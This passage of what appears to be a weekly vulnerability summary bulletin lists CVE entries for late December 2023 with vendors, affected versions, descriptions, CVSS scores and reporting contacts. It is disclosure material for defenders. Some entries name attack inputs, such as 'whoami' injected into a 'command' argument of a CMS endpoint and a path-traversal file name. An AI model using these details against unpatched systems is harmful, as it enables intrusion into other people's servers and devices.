vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the User Management (/admin/users) page of GROWI versions prior to v6.1.11. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-50339
vultures@jpcert.or.jp
vultures@jpcert.or.jp
wiremock — wiremock WireMock with GUI versions 3.2.0.0 through 3.0.4.0 are vulnerable to stored cross-site scripting (SXSS) through the recording feature. An attacker can host a malicious payload and perform a test mapping pointing to the attacker’s file, and the result will render on the Matched page in the Body area, resulting in the execution of the payload. This occurs because the response body is not validated or sanitized. 2023-12-29 not yet calculated CVE-2023-50069
cve@mitre.org
wolters_kluwer — b.point On a Wolters Kluwer B.POINT 23.70.00 server running Linux on premises, during the authentication phase, a validated system user can achieve remote code execution via Argument Injection in the server-to-server module. 2023-12-25 not yet calculated CVE-2023-49328
cve@mitre.org
wordpress — wordpress The WP Sessions Time Monitoring Full Automatic WordPress plugin before 1.0.9 does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique. 2023-12-26 not yet calculated CVE-2023-5203
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users. 2023-12-26 not yet calculated CVE-2023-5644
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. 2023-12-26 not yet calculated CVE-2023-5645
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files. 2023-12-26 not yet calculated CVE-2023-5672
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not properly validate file extensions uploading files to attach to emails, allowing attackers to upload PHP files, leading to remote code execution. 2023-12-26 not yet calculated CVE-2023-5673
contact@wpscan.com
wordpress — wordpress The WP Mail Log WordPress plugin before 1.1.3 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. 2023-12-26 not yet calculated CVE-2023-5674
contact@wpscan.com
wordpress — wordpress The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP on the server. 2023-12-26 not yet calculated CVE-2023-5931
contact@wpscan.com
wordpress — wordpress The rtMedia for WordPress, BuddyPress and bbPress WordPress plugin before 4.6.16 loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users. 2023-12-26 not yet calculated CVE-2023-5939
contact@wpscan.com
wordpress — wordpress The BSK Forms Blacklist WordPress plugin before 3.7 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). 2023-12-26 not yet calculated CVE-2023-5980
contact@wpscan.com
wordpress — wordpress The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorization checks, allowing unauthenticated users to download and delete arbitrary files on the server. 2023-12-26 not yet calculated CVE-2023-5991
contact@wpscan.com
wordpress — wordpress The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site. 2023-12-26 not yet calculated CVE-2023-6114
contact@wpscan.com
contact@wpscan.com
wordpress — wordpress The Quiz Maker WordPress plugin before 6.4.9.5 does not adequately authorize the `ays_quiz_author_user_search` AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses. 2023-12-26 not yet calculated CVE-2023-6155
contact@wpscan.com
wordpress — wordpress The Quiz Maker WordPress plugin before 6.4.9.5 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting 2023-12-26 not yet calculated CVE-2023-6166
contact@wpscan.com
wordpress — wordpress The BestWebSoft’s Like & Share WordPress plugin before 2.74 discloses the content of password protected posts to unauthenticated users via a meta tag 2023-12-26 not yet calculated CVE-2023-6250
contact@wpscan.com
wordpress — wordpress The JSON Content Importer WordPress plugin before 1.5.4 does not sanitize and escape the tab parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin 2023-12-26 not yet calculated CVE-2023-6268
contact@wpscan.com
xenom_technologies — phone_dialer-voice_call_dialer An issue in Xenom Technologies (sinous) Phone Dialer-voice Call Dialer v.1.2.5 allows an attacker to bypass intended access restrictions via interaction with com.funprime.calldialer.ui.activities.OutgoingActivity. 2023-12-27 not yet calculated CVE-2023-49002
cve@mitre.org
cve@mitre.org
xiangshan — xiangshan
 		 An issue was discovered in XiangShan v2.1, allows local attackers to obtain sensitive information via the L1D cache. 2023-12-30 not yet calculated CVE-2023-50559
cve@mitre.org
cve@mitre.org
xnview — classic_for_windows XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3ADBD0. 2023-12-29 not yet calculated CVE-2023-52173
cve@mitre.org
cve@mitre.org
xnview — classic_for_windows XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3125D6. 2023-12-29 not yet calculated CVE-2023-52174
cve@mitre.org
cve@mitre.org
youloft_holding_group_co. — perpetual_calendar An issue in the openFile method of Chinese Perpetual Calendar v9.0.0 allows attackers to read any file via unspecified vectors. 2023-12-28 not yet calculated CVE-2023-51006
cve@mitre.org
zzcms — zzcms ZZCMS 2023 has a file upload vulnerability in 3/E_bak5.1/upload/index.php, allowing attackers to exploit this loophole to gain server privileges and execute arbitrary code. 2023-12-29 not yet calculated CVE-2023-50104
cve@mitre.org

Back to top

Categories
alerts

Vulnerability Summary for the Week of December 18, 2023

 High Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
52north — 52north_wps An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network. 2023-12-19 7.2 CVE-2023-6280
cve-coordination@incibe.es
aditaas — allied_digital_integrated_tool-as-a-service The vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers’ data and completely compromise the targeted platform. 2023-12-18 9.8 CVE-2023-6483
vdisclose@cert-in.org.in
apache — doris The api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues. 2023-12-18 8.2 CVE-2023-41314
security@apache.org
apache — dubbo A deserialization vulnerability existed when decode a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue. 2023-12-15 9.8 CVE-2023-29234
security@apache.org
security@apache.org
apache — dubbo Deserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue. 2023-12-15 9.8 CVE-2023-46279
security@apache.org
security@apache.org
apache — guacamole Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue. 2023-12-19 8.8 CVE-2023-43826
security@apache.org
security@apache.org
apache — guacamole When installing the Net2 software a root certificate is installed into the trusted store. A potential hacker could access the installer batch file or reverse engineer the source code to gain access to the root certificate password. Using the root certificate and password they could then create their own certificates to emulate another site. Then by establishing a proxy service to emulate the site they could monitor traffic passed between the end user and the site allowing access to the data content. 2023-12-19 8.1 CVE-2023-43870
cert@ncsc.nl
apache — pulsar Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions. 2023-12-20 7.5 CVE-2023-37544
security@apache.org
security@apache.org
apache — superset
 		 An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue. 2023-12-19 7.7 CVE-2023-49734
security@apache.org
security@apache.org
armorxgt — spamtrap ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. 2023-12-15 9.8 CVE-2023-48384
twcert@cert.org.tw
aveva — edge An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed. 2023-12-16 9.8 CVE-2021-42796
cve@mitre.org
cve@mitre.org
aveva — edge Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources. 2023-12-16 7.5 CVE-2021-42797
cve@mitre.org
cve@mitre.org
awslabs — sandbox-accounts-for-events “Sandbox Accounts for Events” provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts, it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0. 2023-12-22 7.1 CVE-2023-50928
security-advisories@github.com
security-advisories@github.com
awslabs — sandbox-accounts-for-events Sandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0. 2023-12-22 7.8 CVE-2023-51386
security-advisories@github.com
security-advisories@github.com
backupbliss — backup_migration The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. 2023-12-15 9.8 CVE-2023-6553
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
bazarr — bazarr Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. 2023-12-15 7.5 CVE-2023-50264
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
bazarr — bazarr Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. 2023-12-15 7.5 CVE-2023-50265
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
bosch — cpp13_firmware A command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera. 2023-12-18 7.2 CVE-2023-39509
psirt@bosch.com
bosch — monitor_wall An improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. 2023-12-18 7.5 CVE-2023-32230
psirt@bosch.com
cacti — cacti Cacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `link.php`. Impact of the vulnerability execution of arbitrary code on the server. 2023-12-21 8 CVE-2023-49084
security-advisories@github.com
cacti — cacti Cacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability – arbitrary SQL code execution. As of time of publication, a patch does not appear to exist. 2023-12-22 8.8 CVE-2023-49085
security-advisories@github.com
security-advisories@github.com
cacti — cacti Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `’managers.php’`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `’/cacti/managers.php’` with an SQLi payload in the `’selected_graphs_array’` HTTP GET parameter. As of time of publication, no patched versions exist. 2023-12-22 8.8 CVE-2023-51448
security-advisories@github.com
security-advisories@github.com
cambium_ — epmp_force_300-25 Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges. 2023-12-18 7.8 CVE-2023-6691
ics-cert@hq.dhs.gov
clickhouse — clickhouse ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this exploit can also be triggered via HTTP protocol, however, the attacker will need a valid credential as the HTTP authentication take places first. This issue has been fixed in version 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts. 2023-12-20 7 CVE-2023-47118
security-advisories@github.com
clickhouse — clickhouse ClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20. 2023-12-22 7 CVE-2023-48704
security-advisories@github.com
security-advisories@github.com
codelyfe — stupid_simple_cms A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259. 2023-12-17 9.8 CVE-2023-6901
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codelyfe — stupid_simple_cms A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260. 2023-12-17 9.8 CVE-2023-6902
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codelyfe — stupid_simple_cms A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability. 2023-12-18 9.1 CVE-2023-6907
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
csharp — cws_collaborative_development_platform SmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. 2023-12-15 9.8 CVE-2023-48376
twcert@cert.org.tw
csharp — cws_collaborative_development_platform SmartStar Software CWS is a web-based integration platform, it has a vulnerability of missing authorization and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service. 2023-12-15 8.8 CVE-2023-48375
twcert@cert.org.tw
cybrosys — website_blog_search A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component. 2023-12-15 9.8 CVE-2023-48049
cve@mitre.org
dell — cpg_bios Dell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device. 2023-12-22 7.2 CVE-2023-43088
security_alert@emc.com
dell — supportassist_client_consumer Dell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. 2023-12-22 7.3 CVE-2023-48670
security_alert@emc.com
dlink — dir-850l_firmware An issue in D-Link DIR-850L v.B1_FW223WWb01 allows a remote attacker to execute arbitrary code via a crafted script to the en parameter. 2023-12-19 9.8 CVE-2023-49004
cve@mitre.org
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1. 2023-12-22 7.2 CVE-2023-51387
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue. 2023-12-22 7.5 CVE-2023-51650
security-advisories@github.com
security-advisories@github.com
dromara_hertzbeat — dromara_hertzbeat
 		 Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue. 2023-12-22 7.5 CVE-2022-39337
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
efacec — bcu_500 Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device. 2023-12-20 9.6 CVE-2023-50707
ics-cert@hq.dhs.gov
efacec — bcu_500 A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application. 2023-12-20 8.2 CVE-2023-6689
ics-cert@hq.dhs.gov
engelsystem — engelsystem Englesystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of Javascript code in another user’s context. This vulnerability enables an authenticated user to inject Javascript into other user’s sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1. 2023-12-22 7.3 CVE-2023-50924
security-advisories@github.com
security-advisories@github.com
eset,_spol._s_r.o. — eset_nod32_antivirus Improper validation of the server’s certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted. 2023-12-21 7.5 CVE-2023-5594
security@eset.com
eurotel — etl3100 EuroTel ETL3100 versions v01c01 and v01x37 does not limit the number of attempts to guess administrative credentials in remote password attacks to gain full control of the system. 2023-12-19 9.8 CVE-2023-6928
ics-cert@hq.dhs.gov
eurotel — etl3100 EuroTel ETL3100 versions v01c01 and v01x37 suffer from an unauthenticated configuration and log download vulnerability. This enables the attacker to disclose sensitive information and assist in authentication bypass, privilege escalation, and full system access. 2023-12-19 9.4 CVE-2023-6930
ics-cert@hq.dhs.gov
eurotel — etl3100 EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities. 2023-12-19 7.5 CVE-2023-6929
ics-cert@hq.dhs.gov
forestblog — forestblog A vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247. 2023-12-17 9.8 CVE-2023-6887
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gallagher — controller_6000 A format string issue in the Controller 6000’s optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. 2023-12-18 7.5 CVE-2023-24590
disclosures@gallagher.com
getsentry — sentry-javascript Sentry-Javascript is official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry’s Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0. 2023-12-20 7.5 CVE-2023-50249
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
github — enterprise_server Improper privilege management in all versions of GitHub Enterprise Server allows users with authorized access to the management console with an editor role to escalate their privileges by making requests to the endpoint used for bootstrapping the instance. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.6, 3.10.3, and 3.11.0. 2023-12-21 8 CVE-2023-46647
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github — enterprise_server An insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. 2023-12-21 8.3 CVE-2023-46648
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github — enterprise_server An insertion of sensitive information into log file vulnerability was identified in the log files for a GitHub Enterprise Server back-end service that could permit an `adversary in the middle attack` when combined with other phishing techniques. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 8.1 CVE-2023-6746
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github — enterprise_server An insertion of sensitive information into the log file in the audit log in GitHub Enterprise Server was identified that could allow an attacker to gain access to the management console. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 7.2 CVE-2023-6802
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github — enterprise_server An improper authentication vulnerability was identified in GitHub Enterprise Server that allowed a bypass of Private Mode by using a specially crafted API request. To exploit this vulnerability, an attacker would need network access to the Enterprise Server appliance configured in Private Mode. This vulnerability affected all versions of GitHub Enterprise Server since 3.9 and was fixed in version 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. 2023-12-21 7.5 CVE-2023-6847
product-cna@github.com
product-cna@github.com
product-cna@github.com
gitlab — gitlab A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner 2023-12-17 8.8 CVE-2023-3907
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator. 2023-12-15 8.1 CVE-2023-6680
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards. 2023-12-15 7.5 CVE-2023-3904
cve@gitlab.com
cve@gitlab.com
gmarczynski — dynamic_progress_bar A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component. 2023-12-15 9.8 CVE-2023-40954
cve@mitre.org
cve@mitre.org
grackle — grackle Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn’t checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an applications GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioral characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an applications GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing. 2023-12-22 7.5 CVE-2023-50730
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
hcl_software — hcl_bigfix_platform Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. This XSS vulnerability is in the Download Status Report, which is served by the BigFix Server.  2023-12-21 7.7 CVE-2023-37519
psirt@hcl.com
hcl_software — hcl_bigfix_platform Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay. 2023-12-21 7.7 CVE-2023-37520
psirt@hcl.com
hewlett_packard_enterprise — multiple_products A potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass. 2023-12-19 7.5 CVE-2023-50272
security-alert@hpe.com
hikvision — intercom_broadcast_system A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:ICPASWnmpWWWphpconversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252. 2023-12-17 7.5 CVE-2023-6893
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hitachi_energy — rtu500_scripting_interface A vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by using faking the identity of a RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface. 2023-12-19 7.4 CVE-2023-1514
cybersecurity@hitachienergy.com
hp — system_management_homepage A potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information. 2023-12-17 7.5 CVE-2023-50271
security-alert@hpe.com
ibm — mq_appliance IBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536. 2023-12-18 7.5 CVE-2023-46177
psirt@us.ibm.com
psirt@us.ibm.com
